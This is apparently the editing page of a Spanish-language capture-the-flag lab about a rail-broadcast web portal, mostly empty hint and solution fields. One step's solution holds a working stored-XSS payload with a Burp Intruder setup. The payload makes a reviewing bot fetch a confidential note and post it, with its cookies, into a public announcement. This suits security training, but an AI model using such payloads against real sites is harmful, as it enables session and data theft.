✎

Mejorar lab

Versión mejorada de MesaNet Portal — Rail Broadcasts

Estás creando una nueva versión de este lab. La original queda intacta. Tu versión va firmada por una clave criptográfica generada en tu navegador — sin email, sin contraseña. Si limpias los datos del navegador sin exportar tu identidad, pierdes la autoría sobre tus aportes.

Todavía no tienes una identidad de firma en este navegador.

Datos del lab

Título Resumen Tipo de target Dificultad Tags (separados por coma)

Pasos

Map the gateway API surface

▾

Fase recon, web, foothold, privesc, etc. Título Título corto orientado a la acción. Evita spoilear la clase de vuln.

Objetivo Qué debe lograr el estudiante en este paso. Contexto Opcional: setup o info previa necesaria.

💡 Pista 1 — direccional

Empujón direccional — apunta a dónde mirar sin nombrar la técnica.

🎯 Pista 2 — técnica

Revela la clase de vuln o técnica sin el payload exacto.

🔑 Pista 3 — casi solución

Casi la solución: enfoque específico o comando sin la flag final.

Solución Comando, payload o enfoque exacto. El código queda en idioma original. Criterio de validación Qué HACE un intento correcto (acción), no qué output produce.

Locate the locked confidential note

▾

Fase recon, web, foothold, privesc, etc. Título Título corto orientado a la acción. Evita spoilear la clase de vuln.

Objetivo Qué debe lograr el estudiante en este paso. Contexto Opcional: setup o info previa necesaria.

💡 Pista 1 — direccional

Empujón direccional — apunta a dónde mirar sin nombrar la técnica.

🎯 Pista 2 — técnica

Revela la clase de vuln o técnica sin el payload exacto.

🔑 Pista 3 — casi solución

Casi la solución: enfoque específico o comando sin la flag final.

Solución Comando, payload o enfoque exacto. El código queda en idioma original. Criterio de validación Qué HACE un intento correcto (acción), no qué output produce.

Understand the oversight bot

▾

Fase recon, web, foothold, privesc, etc. Título Título corto orientado a la acción. Evita spoilear la clase de vuln.

Objetivo Qué debe lograr el estudiante en este paso. Contexto Opcional: setup o info previa necesaria.

💡 Pista 1 — direccional

Empujón direccional — apunta a dónde mirar sin nombrar la técnica.

🎯 Pista 2 — técnica

Revela la clase de vuln o técnica sin el payload exacto.

🔑 Pista 3 — casi solución

Casi la solución: enfoque específico o comando sin la flag final.

Solución Comando, payload o enfoque exacto. El código queda en idioma original. Criterio de validación Qué HACE un intento correcto (acción), no qué output produce.

Confirm the HTML injection sink in broadcast creation

▾

Fase recon, web, foothold, privesc, etc. Título Título corto orientado a la acción. Evita spoilear la clase de vuln.

Objetivo Qué debe lograr el estudiante en este paso. Contexto Opcional: setup o info previa necesaria.

💡 Pista 1 — direccional

Empujón direccional — apunta a dónde mirar sin nombrar la técnica.

🎯 Pista 2 — técnica

Revela la clase de vuln o técnica sin el payload exacto.

🔑 Pista 3 — casi solución

Casi la solución: enfoque específico o comando sin la flag final.

Solución Comando, payload o enfoque exacto. El código queda en idioma original. Criterio de validación Qué HACE un intento correcto (acción), no qué output produce.

Craft the exfiltration payload

▾

Fase recon, web, foothold, privesc, etc. Título Título corto orientado a la acción. Evita spoilear la clase de vuln.

Objetivo Qué debe lograr el estudiante en este paso. Contexto Opcional: setup o info previa necesaria.

💡 Pista 1 — direccional

Empujón direccional — apunta a dónde mirar sin nombrar la técnica.

🎯 Pista 2 — técnica

Revela la clase de vuln o técnica sin el payload exacto.

🔑 Pista 3 — casi solución

Casi la solución: enfoque específico o comando sin la flag final.

Solución Comando, payload o enfoque exacto. El código queda en idioma original. Criterio de validación Qué HACE un intento correcto (acción), no qué output produce.

Flood the broadcast table to guarantee bot trigger

▾

Fase recon, web, foothold, privesc, etc. Título Título corto orientado a la acción. Evita spoilear la clase de vuln.

Objetivo Qué debe lograr el estudiante en este paso. Contexto Opcional: setup o info previa necesaria.

💡 Pista 1 — direccional

Empujón direccional — apunta a dónde mirar sin nombrar la técnica.

🎯 Pista 2 — técnica

Revela la clase de vuln o técnica sin el payload exacto.

🔑 Pista 3 — casi solución

Casi la solución: enfoque específico o comando sin la flag final.

Solución Comando, payload o enfoque exacto. El código queda en idioma original.

// Burp Intruder setup:
// Endpoint: POST /gateway (same session cookie as operator)
// Body template:
{
  "id": "f7d4e8b2-3a1c-4f9e-8b2d-1c5e7a9f3b6d",
  "endpoint": "/api/rail/create",
  "data": {
    "type": "safety",
    "message": "<img src=x onerror='fetch(\"/gateway\",{method:\"POST\",headers:{\"Content-Type\":\"application/json\"},credentials:\"include\",body:JSON.stringify({id:\"a7f3c4e9-8b2d-4a6f-9c1e-5d8a3b7f2c4e\",endpoint:\"/api/notes/get\",data:{id:6}})}).then(r=>r.json()).then(d=>fetch(\"/gateway\",{method:\"POST\",headers:{\"Content-Type\":\"application/json\"},credentials:\"include\",body:JSON.stringify({id:\"f7d4e8b2-3a1c-4f9e-8b2d-1c5e7a9f3b6d\",endpoint:\"/api/rail/create\",data:{type:\"announcement\",message:\"PWN_\"+document.cookie+\"_\"+JSON.stringify(d).slice(0,400),timestamp:\"00:00:01\",priority:\"low\"}})}))'>",
    "timestamp": "§00:00:00§",
    "priority": "high"
  }
}
// Intruder Payload: Custom iterator
// Position 1: 00,01,02,...,23  (24 items)
// Position 2: :
// Position 3: 00,05,10,15,20,25,30,35,40,45,50,55  (12 items)
// Position 4: :00
// Total: 288 requests

Criterio de validación Qué HACE un intento correcto (acción), no qué output produce.

Trigger the oversight bot

▾

Fase recon, web, foothold, privesc, etc. Título Título corto orientado a la acción. Evita spoilear la clase de vuln.

Objetivo Qué debe lograr el estudiante en este paso. Contexto Opcional: setup o info previa necesaria.

💡 Pista 1 — direccional

Empujón direccional — apunta a dónde mirar sin nombrar la técnica.

🎯 Pista 2 — técnica

Revela la clase de vuln o técnica sin el payload exacto.

🔑 Pista 3 — casi solución

Casi la solución: enfoque específico o comando sin la flag final.

Solución Comando, payload o enfoque exacto. El código queda en idioma original. Criterio de validación Qué HACE un intento correcto (acción), no qué output produce.

Recover the flag from the bot-created announcement

▾

Fase recon, web, foothold, privesc, etc. Título Título corto orientado a la acción. Evita spoilear la clase de vuln.

Objetivo Qué debe lograr el estudiante en este paso. Contexto Opcional: setup o info previa necesaria.

💡 Pista 1 — direccional

Empujón direccional — apunta a dónde mirar sin nombrar la técnica.

🎯 Pista 2 — técnica

Revela la clase de vuln o técnica sin el payload exacto.

🔑 Pista 3 — casi solución

Casi la solución: enfoque específico o comando sin la flag final.

Solución Comando, payload o enfoque exacto. El código queda en idioma original. Criterio de validación Qué HACE un intento correcto (acción), no qué output produce.